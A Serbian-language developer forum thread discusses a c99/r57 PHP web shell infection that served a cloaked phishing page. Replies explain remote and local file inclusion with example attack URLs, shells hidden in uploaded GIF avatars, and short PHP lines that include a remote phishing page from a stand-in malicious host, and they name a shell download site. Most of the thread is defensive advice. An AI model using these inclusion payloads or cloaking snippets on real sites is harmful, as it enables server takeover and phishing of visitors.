c99, r57 shell pojasnjenje i iskustva?
Pre dve godine sam na jednom starijem sajtu zaradio infekciju sa c99 ili r57 shell scriptom (nisam sad siguran). Nije bilo naivno...ubacio mi je potpuno novi template sa logom i stranicom e-buy gde trazi info o kreditnoj kartici. Prijava je stigla direktno od e buy-a mom hostingu koji je odmah suspendovao sajt. Za sve to vreme na mom domenu se pokazivao moj originalni sadrzaj, ali na neki nacin i u nekim meni nerazumljivim slucajevima je verovatno pozivan i taj lazni ubaceni template, dakle klasicni phishing.
Uglavnom, sredio sam to za par dana, vratio cist backup i posle vise nisam imao problema Do sada nisam nesto istrazivao sve to...ali su me neke ovdasnje teme na DPT podsetile na problem bezbednosti. Da li je neko imao iskustva sa ovim ili mi moze malo blize pojasniti na koji nacin to radi...zasto sam ja video normalno sajt, i u kojim slucajevima je ta skripta prikazivala fake stranicu? Sacuvao sam i taj php fajl koji sam nasao ubacen, ali je kodiran (64 base) pa ne mogu nista da vidim...moze li se to nekako i sa necim dekodirati? :1007: |
Naravno da mozes da ga dekodiras, otvoris sa PHPom i uradis decode i snimis to.
c99 koliko ja znam je shell koji omogucava napadacu da radi sta hoce od fajlova na serveru, a taj drugi nisam cuo. |
Sve te shell scripte mozes da preuzmes, testiras i includujes sa r57.gen.tr/
Generalno ako ti je sajt lose napisan, postoji sansa da napadac pozove scriptu na sledeci nacin: tvojsajt.com/nesto.php?inc=http://r57.gen.tr/99.txt? (primer, umesto ucitavanja lokalnog fajla/strane/itd. preuzima i izvrsava php file direkt na tvom serveru, gde dobija pristup listanju, citanju, brisanju, izmeni itd, zavisno od permisija, generalno dovoljno mu je da moze da procita recimo config fajl i da ti zagorca zivot) Videces u logovima, trazi zahteve koji sadrze "http://", ".txt", ".gif" ka drugim sajtovima, lako ces naci... Pored includovanja, obrati i paznju na upload forme, jedno vreme je phpBB imao sledeci trip: registrujes se kao korisnik na forumu, skines shell scriptu, promenis joj extenziju u .gif, u korisnickom panelu postavis svoj avatar, i onda posto je poznata putanja za upload avatar pokrenes scriptu i dalje radis sta pozelis, kako su to uspeli nije mi jasno, ali mislim da je brzo zakrpljeno (da ne spominjem sto su ljudi u sliku ubacivali php code). Sve zavisi od servera, ja sam imao dosta problema sto se tih scripti tice, jer je klijent drzao stari sajt na Veratu, gde hvala Bogu nemaju nikakav backup, ja sam uradio novi sajt, postavio umesto starog, medjutim nakon sto je "haker" obrisao kompletan sajt trazio sam od administratora da mi posalje logove, pa sam posle par sati ustanovio da nije uploadovana scripta preko mog sajta i da je ista osoba (info: zone-h.org) to vece obrisala preko 90 sajtova, predpostavljam da je na nekom sajtu pronasao propust, uploadovao shell scriptu i isao redom u foldere i brisao sve sto je uspeo (mislim na citanje config fajlova, editovanje) itd. Moj predlog ti je da promenis pass za bazu, ftp i instaliras mod_security ako si u mogucnosti :\ Ono sto sam se uverio licno, postavi recimo r57 ili c99 na bilo koji hosting, pokreni i moci ces da "hakujes" vecinu sajtova na tom serveru. Adminu iz Verata sam pre godinu-dve postavio r57 i izlistao im sve sajtove koji su bili na tom serveru gde je klijent drzao sajt, pokazao im sta i kako funkcionise cisto da bi mogli da se zastite, nakon toga sam klijentu predlozio da zakupi hosting na drugom mestu, i naravno vise nije imao tih problema, da li su me u Veratu poslusali ne znam.... |
1 Prilog(a)
Aha...decodirao sam na ovom decoderu...otvorio mi je bas c99 kompletan kontrolni panel ove scripte.
Koga interesuje da vidi sta tu sve ima, a ima svega!!! moze uciniti isto...fajl u prilogu: |
@3banchi, base64_decode() to što je u eval().
@twix, osiguravanje servera je malo više od instaliranja mod_security, koji je sam po sebi đubre. Ne mora shell da bude na http:// Chini mi se da je upravo sa mod_security pre bila fora ftp://.../shell.txt... Toliko o zaustavljanju RFI-a. Ne mora da bude php shell. Odnosno, disejblovanje suidnih funkcija. Može i perl (cgi) i "apache" shell (fora s' htaccess-om) To sa phpBB-om je verovatno bilo uz pomoć LFI. Jedino tako može da se pokrene PHP shell u gif-u. Moj predlog je da, uz ono što si ti naveo, pregleda sve PHP fajlove izmenjene u skorije vreme...uz nadu da ih nije touch. Edit: Ipak bi bilo gzdeflate(base64_decode({stvar iz eval()})) :D Edit #2 (@msg #6): I give up... |
Citat:
Tako da mi je sad ovo sto si naveo o ubacivanju php koda u gif i sl. extenzije i povezivanje toga sa shellom malo jasnije. Citat:
|
Ummm ja bih još jednom pokušao da se uključim u temu kada sam se već javio...a i volim ovakve teme
Da pokušam da pojasnim to sa shellom u gifu: To sa PHP-om u njoj je slično steganografiji (sakrivanje teksta (valjda se tako kaže na srpskom :D)) u konkretnom slučaju PHP koda u slici. Dakle, slika i dalje ostaje validna (u smislu da se ne menja njen izgled i funkcionalnost)...zbog čega prolazi standardne provere da li je slika zaista slika koje često koriste pri aploadu. Ali, internet media type aka MIME za gif je slika... Dakle, otvoriće mu se standardna slika a ne PHP shell (tj. neće se exec PHP kod). Osim ako nije nekim čudom na tom serveru gif = application/x-httpd-php Sa LFI radi zato što to izgleda tipa: Kôd:
include('images/'.$_GET['štagod']); //<-idealan slučaj = http://sajt.tld/skripta.php?štagod=aploadovana_slika_sa_php_kodom.gif Tako da ovo što si zadnje napisao meni nema nikakvog smisla. Reći ću ovako sada (just in case): Ja bih pregledao logove da vidim kako je taj PHP završio gde je završio i fajlove koji su skoro izmenjeni jer mi i nije baš uteha menjanje passworda ako neko može opet da vidi to... (Za svaki slučaj: pod onim touch sam mislio na: en.wikipedia.org/wiki/Touch_(Unix) ili php.net/touch ili....) |
Molim vas samo pazite kada stavljate linkove do malicioznih sajtova, ubacujete attachmente sa malicioznim kodom ili ubacujete takav kod u tekst poruke, da ne osvane sutra kada otvorim DPT : Warning, this site can harm your computer.
Google to radi ne samo kada je sajt "uhakovan" nego čak i kada postoji na strani link do poznatog malware sajta. |
Citat:
Verovatno je stavio neku banalnu stvar tipa: Kôd:
if(isset($_GET['phishing'])) die(include('http://zlisajt.tld/phishing.html')); Ili, ako ta web aplikacija ostavlja cookies pri poseti ili logovanju (mada je to manje pouzdano), može da proverava da li cookies (ili šta god da može da iskoristi u ovu svrhu) postoji i tako razlikuje validne posetioce od onih koje navlači na phishing. (Podrazumevam da tvoji posetioci nisu meta.) Kôd:
if(!isset($_COOKIE['poslednja_poseta'])) die(include('http://zlisajt.tld/phishing.html')); Elem, osim ako passwordi nisu bili problem, možda ono što napisah sa gledanjem skoro menjanih fajlova ipak možeš da iskoristiš uskoro :D |
@AnonymousCoward: Sto se linux administracije tice, znam na sta mislis, koristim linux 9 godina, ja na svom serveru i ne koristim mod_security, ali kao prvi "lek" i na osnovu ovih informacija, ne mogu mu davati druge savete.
@bluesman: ako mozes izmeni u mom postu onda linkove u recimo hxxp://r57[.]gen[.]tr/ |
Vreme je GMT +2. Trenutno vreme je 19:03. |
Powered by vBulletin® Verzija 3.6.8
Copyright ©2000 - 2024, Jelsoft Enterprises Ltd.
Copyright © DevProTalk. All Rights Reserved.